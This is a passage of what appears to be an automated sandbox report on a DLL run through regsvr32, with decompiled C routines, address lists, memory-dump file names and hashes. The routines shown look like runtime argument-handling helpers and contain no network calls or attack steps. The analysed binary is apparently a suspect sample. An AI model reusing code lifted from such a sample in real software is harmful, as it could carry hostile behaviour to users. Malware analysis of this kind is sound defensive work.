                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80023cfa;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80023cea;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80023ca6;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80023cfa;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80023c9e;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80023ca1;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180023c00
                                                                      0x180023c11
                                                                      0x180023c14
                                                                      0x180023c16
                                                                      0x180023c1b
                                                                      0x180023c23
                                                                      0x180023c26
                                                                      0x180023c35
                                                                      0x180023c37
                                                                      0x180023c3d
                                                                      0x180023c40
                                                                      0x180023c45
                                                                      0x180023c49
                                                                      0x180023c50
                                                                      0x180023c56
                                                                      0x180023c5b
                                                                      0x180023c60
                                                                      0x180023c67
                                                                      0x180023c77
                                                                      0x180023c79
                                                                      0x180023c83
                                                                      0x180023c87
                                                                      0x180023c8f
                                                                      0x180023c91
                                                                      0x180023c97
                                                                      0x180023c9b
                                                                      0x180023c9e
                                                                      0x180023ca4
                                                                      0x180023ca6
                                                                      0x180023caa
                                                                      0x180023cb0
                                                                      0x180023cba
                                                                      0x180023cbc
                                                                      0x180023cc0
                                                                      0x180023cc3
                                                                      0x180023cca
                                                                      0x180023cce
                                                                      0x180023cd5
                                                                      0x180023cd9
                                                                      0x180023cde
                                                                      0x180023ce3
                                                                      0x180023ce8
                                                                      0x180023cf5
                                                                      0x180023d04

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction ID: c0e6d2c7ea9cd6f475090c0eac546cb07701ab9eed8c63fa6c2ebbf09b781cc2
                                                                      • Opcode Fuzzy Hash: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction Fuzzy Hash: B631A2B2214B88C6EB628F29D0523AD7BA0F39DF88F258125DB8D0B751CF36C556CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180025CB0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80025cdb;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80025da8;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80025d1c;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80025daa;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80025d9a;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80025d56;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80025daa;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80025d4e;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80025d51;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180025cb0
                                                                      0x180025cc1
                                                                      0x180025cc4
                                                                      0x180025cc6
                                                                      0x180025ccb
                                                                      0x180025cd3
                                                                      0x180025cd6
                                                                      0x180025ce5
                                                                      0x180025ce7
                                                                      0x180025ced
                                                                      0x180025cf0
                                                                      0x180025cf5
                                                                      0x180025cf9
                                                                      0x180025d00
                                                                      0x180025d06
                                                                      0x180025d0b
                                                                      0x180025d10
                                                                      0x180025d17
                                                                      0x180025d27
                                                                      0x180025d29
                                                                      0x180025d33
                                                                      0x180025d37
                                                                      0x180025d3f
                                                                      0x180025d41
                                                                      0x180025d47
                                                                      0x180025d4b
                                                                      0x180025d4e
                                                                      0x180025d54
                                                                      0x180025d56
                                                                      0x180025d5a
                                                                      0x180025d60
                                                                      0x180025d6a
                                                                      0x180025d6c
                                                                      0x180025d70
                                                                      0x180025d73
                                                                      0x180025d7a
                                                                      0x180025d7e
                                                                      0x180025d85
                                                                      0x180025d89
                                                                      0x180025d8e
                                                                      0x180025d93
                                                                      0x180025d98
                                                                      0x180025da5
                                                                      0x180025db4

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction ID: 622c7f77429d0126e3a324c25d3cdaceb56348cac049a41979da5ff3e1f7e87e
                                                                      • Opcode Fuzzy Hash: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction Fuzzy Hash: 8A319172214B8886EBA28F29D4443AD7BA0F38DB88F248125DB8C4B351DF36C556CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001BCD4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001bcff;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8001bdce;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001bd40;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001bdd0;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001bdc0;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001bd7c;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001bdd0;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001bd74;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001bd77;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x18001bcd4
                                                                      0x18001bce5
                                                                      0x18001bce8
                                                                      0x18001bcea
                                                                      0x18001bcef
                                                                      0x18001bcf7
                                                                      0x18001bcfa
                                                                      0x18001bd09
                                                                      0x18001bd0b
                                                                      0x18001bd11
                                                                      0x18001bd14
                                                                      0x18001bd19
                                                                      0x18001bd1d
                                                                      0x18001bd24
                                                                      0x18001bd2a
                                                                      0x18001bd2f
                                                                      0x18001bd34
                                                                      0x18001bd3b
                                                                      0x18001bd4b
                                                                      0x18001bd4d
                                                                      0x18001bd57
                                                                      0x18001bd5c
                                                                      0x18001bd64
                                                                      0x18001bd66
                                                                      0x18001bd6c
                                                                      0x18001bd71
                                                                      0x18001bd74
                                                                      0x18001bd7a
                                                                      0x18001bd7c
                                                                      0x18001bd80
                                                                      0x18001bd86
                                                                      0x18001bd90
                                                                      0x18001bd92
                                                                      0x18001bd96
                                                                      0x18001bd99
                                                                      0x18001bda0
                                                                      0x18001bda4
                                                                      0x18001bdab
                                                                      0x18001bdaf
                                                                      0x18001bdb4
                                                                      0x18001bdb9
                                                                      0x18001bdbe
                                                                      0x18001bdcb
                                                                      0x18001bdda

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction ID: 1bab075be07c2e79d388975761db4898376f125fc97f3c34dbd69cda015fc799
                                                                      • Opcode Fuzzy Hash: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction Fuzzy Hash: 83317F72204A48C6EBA58F29E0503AD77A4F39DB8CF258129EB8C4B760DF36C556CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 315600e701ee3048435909966d0374ecf8d31cadebe10be8ef2247d14c2daf09
                                                                      • Instruction ID: a2da6581dab57c8a35223484a3cb3dd7a446c3424f84cdf0de510b64bac97893
                                                                      • Opcode Fuzzy Hash: 315600e701ee3048435909966d0374ecf8d31cadebe10be8ef2247d14c2daf09
                                                                      • Instruction Fuzzy Hash: B531C6B062C781ABC788DF28C19691EBBF1FBC8344F806A2DF8868B350D7749445CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E0000000118001A248(void* __eax, long long __rbx, long long __rcx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t42;
                                                                      				intOrPtr _t55;
                                                                      				signed long long _t56;
                                                                      				intOrPtr _t59;
                                                                      				void* _t62;
                                                                      				intOrPtr _t65;
                                                                      				void* _t68;
                                                                      				intOrPtr* _t69;
                                                                      				long long _t70;
                                                                      				void* _t71;
                                                                      				void* _t72;
                                                                      				void* _t76;
                                                                      				void* _t77;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t62 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a271;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t65 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x8001a33e;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a2b2;
                                                                      				_t55 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t55 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t55 + 0x2c)) = 0x16;
                                                                      				_t56 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t56;
                                                                      				_v24 = _t70;
                                                                      				E0000000118003AA20(_t56, __rcx, _t65, _t68, _t71, _t72, _t76);
                                                                      				goto 0x8001a344;
                                                                      				if ( *((intOrPtr*)(_t65 + 0x470)) != 1) goto 0x8001a332;
                                                                      				_t42 =  *((intOrPtr*)(_t65 + 0x34));
                                                                      				r9d =  *(_t62 + 0x3a) & 0x0000ffff;
                                                                      				_t69 = _t62 + (_t56 + _t56 * 2 + 0x90) * 8;
                                                                      				if ( *_t69 != 0) goto 0x8001a2ee;
                                                                      				 *_t69 = 4;
                                                                      				 *((intOrPtr*)(_t69 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t69 + 0x10)) = _t42;
                                                                      				dil = 1;
                                                                      				goto 0x8001a344;
                                                                      				_v24 = _t42;
                                                                      				r8d = 4;
                                                                      				if (E00000001180017AF4(_t62, _t62, _t69, _t71, _t77) != 0) goto 0x8001a2e6;
                                                                      				_t59 =  *((intOrPtr*)(_t62 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t59 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t62 + 8));
                                                                      				_v24 = _t70;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t62 + 8)), _t62, _t62, _t69, _t71, _t72, _t76);
                                                                      				goto 0x8001a2e9;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}


















                                                                      0x18001a248
                                                                      0x18001a259
                                                                      0x18001a25c
                                                                      0x18001a25e
                                                                      0x18001a263
                                                                      0x18001a267
                                                                      0x18001a26c
                                                                      0x18001a27b
                                                                      0x18001a27d
                                                                      0x18001a283
                                                                      0x18001a286
                                                                      0x18001a28b
                                                                      0x18001a28f
                                                                      0x18001a296
                                                                      0x18001a29c
                                                                      0x18001a2a1
                                                                      0x18001a2a6
                                                                      0x18001a2ad
                                                                      0x18001a2bd
                                                                      0x18001a2bf
                                                                      0x18001a2c9
                                                                      0x18001a2ce
                                                                      0x18001a2d6
                                                                      0x18001a2d8
                                                                      0x18001a2de
                                                                      0x18001a2e3
                                                                      0x18001a2e6
                                                                      0x18001a2ec
                                                                      0x18001a2ee
                                                                      0x18001a2f2
                                                                      0x18001a302
                                                                      0x18001a304
                                                                      0x18001a308
                                                                      0x18001a30b
                                                                      0x18001a312
                                                                      0x18001a316
                                                                      0x18001a321
                                                                      0x18001a326
                                                                      0x18001a32b
                                                                      0x18001a330
                                                                      0x18001a33a
                                                                      0x18001a340
                                                                      0x18001a34e

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2e0132f0ebbd637aec2d7c2047e28726dce862410b1bd3bb9f545f50a95edbb
                                                                      • Instruction ID: 8cdb0e2add7c519815cdea3098279cfce2056e80e5e32f5874d190dcd0ba57aa
                                                                      • Opcode Fuzzy Hash: c2e0132f0ebbd637aec2d7c2047e28726dce862410b1bd3bb9f545f50a95edbb
                                                                      • Instruction Fuzzy Hash: C931B472208A48C6EB61CF29D0403AD77A0F79EB8CF248125EB4D4B751DF36C696CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E0000000118001C46C(void* __eax, long long __rbx, long long __rcx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t42;
                                                                      				intOrPtr _t55;
                                                                      				signed long long _t56;
                                                                      				intOrPtr _t59;
                                                                      				void* _t62;
                                                                      				intOrPtr _t65;
                                                                      				void* _t68;
                                                                      				intOrPtr* _t69;
                                                                      				long long _t70;
                                                                      				void* _t71;
                                                                      				void* _t72;
                                                                      				void* _t76;
                                                                      				void* _t77;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t62 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001c495;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t65 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x8001c562;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001c4d6;
                                                                      				_t55 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t55 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t55 + 0x2c)) = 0x16;
                                                                      				_t56 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t56;
                                                                      				_v24 = _t70;
                                                                      				E0000000118003AA20(_t56, __rcx, _t65, _t68, _t71, _t72, _t76);
                                                                      				goto 0x8001c568;
                                                                      				if ( *((intOrPtr*)(_t65 + 0x470)) != 1) goto 0x8001c556;
                                                                      				_t42 =  *((intOrPtr*)(_t65 + 0x34));
                                                                      				r9d =  *(_t62 + 0x3a) & 0x0000ffff;
                                                                      				_t69 = _t62 + (_t56 + _t56 * 2 + 0x90) * 8;
                                                                      				if ( *_t69 != 0) goto 0x8001c512;
                                                                      				 *_t69 = 4;
                                                                      				 *((intOrPtr*)(_t69 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t69 + 0x10)) = _t42;
                                                                      				dil = 1;
                                                                      				goto 0x8001c568;
                                                                      				_v24 = _t42;
                                                                      				r8d = 4;
                                                                      				if (E00000001180010A8C(_t62, _t62, _t69, _t71, _t77) != 0) goto 0x8001c50a;
                                                                      				_t59 =  *((intOrPtr*)(_t62 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t59 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t62 + 8));
                                                                      				_v24 = _t70;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t62 + 8)), _t62, _t62, _t69, _t71, _t72, _t76);
                                                                      				goto 0x8001c50d;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}


















                                                                      0x18001c46c
                                                                      0x18001c47d
                                                                      0x18001c480
                                                                      0x18001c482
                                                                      0x18001c487
                                                                      0x18001c48b
                                                                      0x18001c490
                                                                      0x18001c49f
                                                                      0x18001c4a1
                                                                      0x18001c4a7
                                                                      0x18001c4aa
                                                                      0x18001c4af
                                                                      0x18001c4b3
                                                                      0x18001c4ba
                                                                      0x18001c4c0
                                                                      0x18001c4c5
                                                                      0x18001c4ca
                                                                      0x18001c4d1
                                                                      0x18001c4e1
                                                                      0x18001c4e3
                                                                      0x18001c4ed
                                                                      0x18001c4f2
                                                                      0x18001c4fa
                                                                      0x18001c4fc
                                                                      0x18001c502
                                                                      0x18001c507
                                                                      0x18001c50a
                                                                      0x18001c510
                                                                      0x18001c512
                                                                      0x18001c516
                                                                      0x18001c526
                                                                      0x18001c528
                                                                      0x18001c52c
                                                                      0x18001c52f
                                                                      0x18001c536
                                                                      0x18001c53a
                                                                      0x18001c545
                                                                      0x18001c54a
                                                                      0x18001c54f
                                                                      0x18001c554
                                                                      0x18001c55e
                                                                      0x18001c564
                                                                      0x18001c572

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2e0132f0ebbd637aec2d7c2047e28726dce862410b1bd3bb9f545f50a95edbb
                                                                      • Instruction ID: b52f720135073c73e24176c5cd96d658a268c8bc33afde27e84d89105cbd7c63
                                                                      • Opcode Fuzzy Hash: c2e0132f0ebbd637aec2d7c2047e28726dce862410b1bd3bb9f545f50a95edbb
                                                                      • Instruction Fuzzy Hash: EC31BFB2204E88C6EB61CF29D0407AD77A1F399F88F648115EB4D0B750DF36C596CB09
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 43%
                                                                      			E0000000118001AD70(void* __eax, long long __rbx, long long __rcx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t41;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				long long _t63;
                                                                      				intOrPtr _t66;
                                                                      				void* _t69;
                                                                      				intOrPtr* _t70;
                                                                      				long long _t71;
                                                                      				void* _t72;
                                                                      				void* _t73;
                                                                      				void* _t77;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t63 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001ad99;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t66 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x8001ae64;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001adda;
                                                                      				_t56 =  *((intOrPtr*)(_t66 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
